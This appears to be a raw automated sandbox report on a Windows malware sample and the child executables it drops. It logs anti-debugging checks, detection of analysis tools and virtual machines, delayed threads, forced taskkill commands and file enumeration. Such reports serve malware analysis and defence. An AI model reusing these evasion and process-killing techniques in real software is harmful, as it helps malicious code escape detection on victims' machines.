Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Code function: 8_2_0019753B FindFirstFileExW,		8_2_0019753B
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Code function: 8_2_0018E679 FindFirstFileExW,GetLastError,FindNextFileW,GetLastError,		8_2_0018E679

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 30000			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 30000			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	File opened: C:\Users\user\AppData\Local\Temp\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	File opened: C:\Users\user\AppData\Local\Temp\_MEI51~1\tcl\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	File opened: C:\Users\user\AppData\Local\Temp\_MEI51~1\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	File opened: C:\Users\user\AppData\	Jump to behavior

Source: skotes.exe, skotes.exe, 00000006.00000002.3344840710.00000000007E5000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: cacert.pem.39.dr	Binary or memory string: j2aTPs+9xYa9+bG3tD60B8jzljHz7aRP+KNOjSkVWLjVb3/ubCK1sK9IRQq9qEmU
Source: skotes.exe, 00000006.00000002.3347261367.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.3347261367.0000000000A68000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Fi3ptS6O8D.exe, 00000000.00000002.2141161689.0000000000525000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000002.00000002.2161095672.00000000007E5000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000003.00000002.2170141642.00000000007E5000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000006.00000002.3344840710.00000000007E5000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: cacert.pem.39.dr	Binary or memory string: zJVSk/BwJVmcIGfE7vmLV2H0knZ9P4SNVbfo5azV8fUZVqZa+5Acr5Pr5RzUZ5dd
Source: rsn.exe, 00000009.00000002.3342683547.000000000106A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe

Code function: 0_2_04F40D14 rdtsc

0_2_04F40D14

Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe

Code function: 8_2_00188321 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

8_2_00188321

Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe

Code function: 8_2_00184790 MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,

8_2_00184790

Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	Code function: 0_2_0036652B mov eax, dword ptr fs:[00000030h]	0_2_0036652B
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	Code function: 0_2_0036A302 mov eax, dword ptr fs:[00000030h]	0_2_0036A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_0062A302 mov eax, dword ptr fs:[00000030h]	2_2_0062A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_0062652B mov eax, dword ptr fs:[00000030h]	2_2_0062652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_2_0062A302 mov eax, dword ptr fs:[00000030h]	3_2_0062A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_2_0062652B mov eax, dword ptr fs:[00000030h]	3_2_0062652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_0062A302 mov eax, dword ptr fs:[00000030h]	6_2_0062A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_0062652B mov eax, dword ptr fs:[00000030h]	6_2_0062652B
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Code function: 8_2_00190422 mov eax, dword ptr fs:[00000030h]	8_2_00190422

Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe

Code function: 8_2_00198964 GetProcessHeap,

8_2_00198964

Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Code function: 8_2_00188321 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_00188321
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Code function: 8_2_001884B3 SetUnhandledExceptionFilter,	8_2_001884B3
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Code function: 8_2_00187D8A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	8_2_00187D8A
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Code function: 8_2_001917C9 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_001917C9

Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe "C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe "C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Process created: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe "C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill.exe /F /IM "nvidia.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill.exe /F /IM "svdhost.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill.exe /F /IM "csrr.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill.exe /F /IM "mnn.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill.exe /F /IM "mme.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill.exe /F /IM "nnu.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill.exe /F /IM "lss.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill.exe /F /IM "onn.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill.exe /F /IM "u-eng.exe"

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill.exe /F /IM "nvidia.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill.exe /F /IM "svdhost.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill.exe /F /IM "csrr.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill.exe /F /IM "mnn.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill.exe /F /IM "mme.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill.exe /F /IM "nnu.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill.exe /F /IM "lss.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill.exe /F /IM "onn.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill.exe /F /IM "u-eng.exe"

Source: Fi3ptS6O8D.exe, 00000000.00000002.2141294421.0000000000567000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000002.00000002.2161680544.0000000000827000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000003.00000002.2170317785.0000000000827000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: Program Manager
Source: skotes.exe	Binary or memory string: IV\ Program Manager

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Code function: 6_2_0060DD91 cpuid

6_2_0060DD91

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI51562\_ctypes.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI51562\_ssl.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI51562\_socket.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI51562\bz2.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI51562\_hashlib.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\4z5zud VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\4z5zud VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI51562\win32api.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\tmp4j7p1d\gen_py\__init__.py VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\tmp4j7p1d\gen_py\dicts.dat VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI51562\win32event.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI51562\select.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe VolumeInformation	Jump to behavior
